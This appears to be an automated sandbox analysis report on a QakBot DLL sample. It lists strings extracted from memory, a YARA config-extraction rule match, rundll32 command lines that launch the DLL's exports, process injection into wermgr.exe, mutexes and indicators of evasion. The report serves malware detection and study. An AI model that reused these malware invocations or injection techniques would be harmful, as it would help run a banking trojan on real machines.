            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/help/linkedin?lang=en&amp;trk=homepage-basic_directory_helpCenterUrl
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/jobs/accounting-jobs-h
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/jobs/administrative-assistant-jobs-h
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/jobs/administrative-jobs-h
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/jobs/arts-and-design-jobs-h
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/jobs/business-development-jobs-h
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/jobs/community-and-social-services-jobs-h
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/jobs/consulting-jobs-h
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/jobs/customer-service-jobs-h
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/jobs/education-jobs-h
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/jobs/engineering-jobs-h
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/jobs/entrepreneurship-jobs-h
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/jobs/finance-jobs-h
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/jobs/healthcare-services-jobs-h
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/jobs/human-resources-jobs-h
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/jobs/information-technology-jobs-h
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/jobs/jobs-in-h
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/jobs/legal-jobs-h
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/jobs/marketing-jobs-h
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/jobs/media-and-communications-jobs-h
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/jobs/military-and-protective-services-jobs-h
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/jobs/operations-jobs-h
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/jobs/product-management-jobs-h
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/jobs/program-and-project-management-jobs-h
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/jobs/purchasing-jobs-h
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/jobs/quality-assurance-jobs-h
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/jobs/real-estate-jobs-h
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/jobs/research-jobs-h
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/jobs/retail-associate-jobs-h
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/jobs/sales-jobs-h
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/jobs/search?trk=guest_homepage-basic_guest_nav_menu_jobs
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/jobs/support-jobs-h
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/jobs?trk=homepage-basic_directory_jobsHomeUrl
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/learning/?trk=homepage-basic_directory_learningHomeUrl
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/learning/search?trk=guest_homepage-basic_guest_nav_menu_learning
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/learning/search?trk=homepage-basic_brand-discovery_intent-module-thirdBtn
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/learning/topics/aec?trk=homepage-basic_learning-cta
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/learning/topics/animation-and-illustration?trk=homepage-basic_learning-cta
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/learning/topics/artificial-intelligence?trk=homepage-basic_learning-cta
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/learning/topics/audio-and-music?trk=homepage-basic_learning-cta
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/learning/topics/business-analysis-and-strategy?trk=homepage-basic_learning-
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/learning/topics/business-software-and-tools?trk=homepage-basic_learning-cta
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/learning/topics/career-development-5?trk=homepage-basic_learning-cta
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/learning/topics/cloud-computing-5?trk=homepage-basic_learning-cta
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/learning/topics/customer-service-3?trk=homepage-basic_learning-cta
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/learning/topics/data-science?trk=homepage-basic_learning-cta
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/learning/topics/database-management?trk=homepage-basic_learning-cta
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/learning/topics/devops?trk=homepage-basic_learning-cta
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/learning/topics/diversity-equity-and-inclusion-dei?trk=homepage-basic_learn
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/learning/topics/finance-and-accounting?trk=homepage-basic_learning-cta
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/learning/topics/graphic-design?trk=homepage-basic_learning-cta
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/learning/topics/human-resources-3?trk=homepage-basic_learning-cta
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/learning/topics/it-help-desk-5?trk=homepage-basic_learning-cta
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/learning/topics/leadership-and-management?trk=homepage-basic_learning-cta
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/learning/topics/marketing-2?trk=homepage-basic_learning-cta
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/learning/topics/mobile-development?trk=homepage-basic_learning-cta
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/learning/topics/motion-graphics-and-vfx?trk=homepage-basic_learning-cta
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/learning/topics/network-and-system-administration?trk=homepage-basic_learni
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/learning/topics/photography-2?trk=homepage-basic_learning-cta
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/learning/topics/product-and-manufacturing?trk=homepage-basic_learning-cta
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/learning/topics/professional-development?trk=homepage-basic_learning-cta
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/learning/topics/project-management?trk=homepage-basic_learning-cta
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/learning/topics/sales-3?trk=homepage-basic_learning-cta
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/learning/topics/security-3?trk=homepage-basic_learning-cta
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/learning/topics/small-business-and-entrepreneurship?trk=homepage-basic_lear
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/learning/topics/software-development?trk=homepage-basic_learning-cta
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/learning/topics/training-and-education?trk=homepage-basic_learning-cta
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/learning/topics/user-experience?trk=homepage-basic_learning-cta
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/learning/topics/video-2?trk=homepage-basic_learning-cta
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/learning/topics/visualization-and-real-time?trk=homepage-basic_learning-cta
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/learning/topics/web-design?trk=homepage-basic_learning-cta
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/learning/topics/web-development?trk=homepage-basic_learning-cta
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/legal/cookie-policy
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/legal/cookie-policy?trk=homepage-basic_footer-cookie-policy
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/legal/copyright-policy?trk=homepage-basic_footer-copyright-policy
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/legal/privacy-policy?trk=homepage-basic_footer-privacy-policy
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/legal/professional-community-policies?trk=homepage-basic_footer-community-g
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/legal/user-agreement?trk=homepage-basic_footer-user-agreement
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/login?fromSignIn=true&amp;trk=guest_homepage-basic_nav-header-signin
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/mypreferences/g/guest-cookies
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/products?trk=homepage-basic_directory_productsHomeUrl
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/psettings/guest-controls?trk=homepage-basic_footer-guest-controls
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/pub/dir/
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/pulse/topics/business-administration-s50111/
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/pulse/topics/construction-management-s831/
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/pulse/topics/engineering-s166/
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/pulse/topics/healthcare-s282/
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/pulse/topics/home/
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/pulse/topics/home/?trk=guest_homepage-basic_guest_nav_menu_articles
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/pulse/topics/it-services-s57547/
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/pulse/topics/marketing-s2461/
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/pulse/topics/public-administration-s3697/
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/pulse/topics/sustainability-s932/
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/pulse/topics/telecommunications-s314/
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/salary/?trk=homepage-basic_directory_salaryHomeUrl
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/search/results/content?trk=guest_homepage-basic_guest_nav_menu_posts
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/services?trk=homepage-basic_directory_servicesHomeUrl
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/signup
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/signup?trk=guest_homepage-basic_directory
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/signup?trk=guest_homepage-basic_nav-header-join
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/signup?trk=homepage-basic_join-cta
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/talent/post-a-job?trk=homepage-basic_talent-finder-cta
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/uas/login-submit
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://www.linkedin.com/uas/request-password-reset?trk=homepage-basic_forgot_password
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://za.linkedin.com/
            Source: 1X93SLWC.htm.22.drString found in binary or memory: https://zw.linkedin.com/
            Source: unknownDNS traffic detected: queries for: linkedin.com
            Source: loaddll32.exe, 00000000.00000002.383261687.000000000102B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
            Source: 042_qbot.dll.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, 32BIT_MACHINE, DLL
            Source: 15.2.rundll32.exe.10000000.1.unpack, type: UNPACKEDPEMatched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68
            Source: 15.2.rundll32.exe.2980960.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68
            Source: 15.2.rundll32.exe.2980960.0.unpack, type: UNPACKEDPEMatched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 664
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6ADAACE03_2_6ADAACE0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6ADA68803_2_6ADA6880
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_10018E2015_2_10018E20
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_10003A4015_2_10003A40
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_100172EF15_2_100172EF
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_100132F115_2_100132F1
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_10016F3015_2_10016F30
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_10014B5315_2_10014B53
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_100144D8 NtProtectVirtualMemory,NtProtectVirtualMemory,15_2_100144D8
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_1000A51F NtAllocateVirtualMemory,NtWriteVirtualMemory,15_2_1000A51F
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_1000A93E GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,15_2_1000A93E
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_1000AA38 GetLastError,NtResumeThread,FindCloseChangeNotification,15_2_1000AA38
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_1000CAF3 NtAllocateVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,15_2_1000CAF3
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: schannel.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: ncrypt.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: ntasn1.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: ncryptsslp.dll
            Source: 042_qbot.dll.dllStatic PE information: Number of sections : 15 > 10
            Source: 042_qbot.dll.dllReversingLabs: Detection: 58%
            Source: 042_qbot.dll.dllVirustotal: Detection: 64%
            Source: 042_qbot.dll.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\042_qbot.dll.dll"
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\042_qbot.dll.dll",#1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\042_qbot.dll.dll,lcopy_block_row
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\042_qbot.dll.dll",#1
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 664
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5436 -s 652
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\042_qbot.dll.dll,lcopy_sample_rows
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\042_qbot.dll.dll,ldiv_round_up
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\042_qbot.dll.dll",lcopy_block_row
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\042_qbot.dll.dll",lcopy_sample_rows
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\042_qbot.dll.dll",ldiv_round_up
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\042_qbot.dll.dll",next
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\042_qbot.dll.dll",lround_up
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\042_qbot.dll.dll",lpeg_write_tables
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7048 -s 652
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5796 -s 660
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\042_qbot.dll.dll",#1Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\042_qbot.dll.dll,lcopy_block_rowJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\042_qbot.dll.dll,lcopy_sample_rowsJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\042_qbot.dll.dll,ldiv_round_upJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\042_qbot.dll.dll",lcopy_block_rowJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\042_qbot.dll.dll",lcopy_sample_rowsJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\042_qbot.dll.dll",ldiv_round_upJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\042_qbot.dll.dll",nextJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\042_qbot.dll.dll",lround_upJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\042_qbot.dll.dll",lpeg_write_tablesJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\042_qbot.dll.dll",#1Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exeJump to behavior
            Source: C:\Windows\SysWOW64\wermgr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Meyihpxz
            Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER78EA.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winDLL@30/19@2/100
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_1000D2F7 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,15_2_1000D2F7
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_1000C800 CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,15_2_1000C800
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\042_qbot.dll.dll,lcopy_block_row
            Source: C:\Windows\SysWOW64\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{E154713E-25B3-45C5-A3DC-8DA544C3AF30}
            Source: C:\Windows\SysWOW64\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\{E154713E-25B3-45C5-A3DC-8DA544C3AF30}
            Source: C:\Windows\SysWOW64\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\{6AEC8A1C-0439-4DEA-95FA-45D0A4E65B5D}
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1108
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7160:120:WilError_01
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7048
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5796
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5436
            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\wermgr.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\SysWOW64\wermgr.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\SysWOW64\wermgr.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: 042_qbot.dll.dllStatic PE information: More than 104 > 100 exports found
            Source: 042_qbot.dll.dllStatic PE information: Image base 0x6ad80000 > 0x60000000
            Source: 042_qbot.dll.dllStatic PE information: section name: /4
            Source: 042_qbot.dll.dllStatic PE information: section name: /14
            Source: 042_qbot.dll.dllStatic PE information: section name: /29
            Source: 042_qbot.dll.dllStatic PE information: section name: /41
            Source: 042_qbot.dll.dllStatic PE information: section name: /55
            Source: 042_qbot.dll.dllStatic PE information: section name: /67
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6AD814B0 GetModuleHandleA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,3_2_6AD814B0
            Source: 042_qbot.dll.dllStatic PE information: real checksum: 0xc341d should be: 0xbf9af

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7220 base: 9B3C50 value: E9 63 D7 28 02 Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
